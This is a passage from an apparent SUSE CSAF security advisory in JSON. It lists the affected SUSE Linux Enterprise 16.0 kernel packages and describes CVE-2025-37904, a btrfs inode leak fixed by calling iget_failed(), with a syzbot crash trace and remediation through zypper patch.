"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37845"
},
{
"cve": "CVE-2025-37904",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37904"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix the inode leak in btrfs_iget()\n\n[BUG]\nThere is a bug report that a syzbot reproducer can lead to the following\nbusy inode at unmount time:\n\n BTRFS info (device loop1): last unmount of filesystem 1680000e-3c1e-4c46-84b6-56bd3909af50\n VFS: Busy inodes after unmount of loop1 (btrfs)\n ------------[ cut here ]------------\n kernel BUG at fs/super.c:650!\n Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n CPU: 0 UID: 0 PID: 48168 Comm: syz-executor Not tainted 6.15.0-rc2-00471-g119009db2674 #2 PREEMPT(full)\n Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n RIP: 0010:generic_shutdown_super+0x2e9/0x390 fs/super.c:650\n Call Trace:\n \u003cTASK\u003e\n kill_anon_super+0x3a/0x60 fs/super.c:1237\n btrfs_kill_super+0x3b/0x50 fs/btrfs/super.c:2099\n deactivate_locked_super+0xbe/0x1a0 fs/super.c:473\n deactivate_super fs/super.c:506 [inline]\n deactivate_super+0xe2/0x100 fs/super.c:502\n cleanup_mnt+0x21f/0x440 fs/namespace.c:1435\n task_work_run+0x14d/0x240 kernel/task_work.c:227\n resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]\n exit_to_user_mode_loop kernel/entry/common.c:114 [inline]\n exit_to_user_mode_prepare include/linux/entry-common.h:329 [inline]\n __syscall_exit_to_user_mode_work kernel/entry/common.c:207 [inline]\n syscall_exit_to_user_mode+0x269/0x290 kernel/entry/common.c:218\n do_syscall_64+0xd4/0x250 arch/x86/entry/syscall_64.c:100\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n \u003c/TASK\u003e\n\n[CAUSE]\nWhen btrfs_alloc_path() failed, btrfs_iget() directly returned without\nreleasing the inode already allocated by btrfs_iget_locked().\n\nThis results the above busy inode and trigger the kernel BUG.\n\n[FIX]\nFix it by calling iget_failed() if btrfs_alloc_path() failed.\n\nIf we hit error inside btrfs_read_locked_inode(), it will properly call\niget_failed(), so nothing to worry about.\n\nAlthough the iget_failed() cleanup inside btrfs_read_locked_inode() is a\nbreak of the normal error handling scheme, let\u0027s fix the obvious bug\nand backport first, then rework the error handling later.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37904",
"url": "https://www.suse.com/security/cve/CVE-2025-37904"
},
{
"category": "external",
"summary": "SUSE Bug 1243452 for CVE-2025-37904",
"url": "https://bugzilla.suse.com/1243452"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
